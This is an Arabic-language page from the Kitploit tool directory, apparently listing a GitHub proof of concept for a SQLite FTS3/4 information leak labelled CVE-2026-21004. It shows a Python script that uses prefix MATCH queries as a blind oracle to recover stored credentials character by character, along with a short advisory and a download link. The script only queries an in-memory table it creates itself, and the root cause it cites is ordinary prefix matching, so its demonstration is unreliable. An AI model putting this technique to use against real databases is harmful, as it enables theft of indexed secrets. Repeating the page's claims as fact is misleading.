Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — استغلال إثبات المفهوم لـ CVE-2026-21004: يستخدم استعلامات بادئة MATCH مُصمَّمة بعناية في SQLite FTS3/4 كوسيط أعمى (blind oracle) لاستعادة البيانات السرية المفهرسة حرفًا بحرف. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
تحليل الثغرات الأمنيةالاستغلالتسريب البياناتأمن قواعد البيانات
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

استغلال إثبات المفهوم لـ CVE-2026-21004: يستخدم استعلامات بادئة MATCH مُصمَّمة بعناية في SQLite FTS3/4 كوسيط أعمى (blind oracle) لاستعادة البيانات السرية المفهرسة حرفًا بحرف.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 17 أياملم تتم المراجعة بعد

CVE-2026-21004 – تسريب معلومات Match في SQLite FTS3 عبر صياغة الاستعلامات

كود البرنامج (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – تسريب معلومات Match في SQLite FTS3/4

Severity: High

نظرة عامة

من خلال ملاحظة ما إذا حدث تطابق (أو فروق التوقيت)، يمكن للمهاجم تخمين محتوى فهرس النص الكامل حرفًا بحرف واستخراج بيانات حساسة.

تفاصيل الثغرة

  • النوع: كشف المعلومات / الحقن الأعمى
  • التأثير: تسريب البيانات من الأعمدة المفهرسة.
  • السبب الجذري: يدعم عامل التشغيل FTS MATCH استعلامات البادئة (term*)، مما يتيح للمهاجم تنفيذ هجوم القاموس دون معرفة المصطلح الكامل.

توضيح الاستغلال

شغّل الاستغلال:

root@kitploit:~
python sqlite_fts_leak.py

يستعيد السكربت محتوى جدول secrets تدريجيًا.

تنزيل الأداة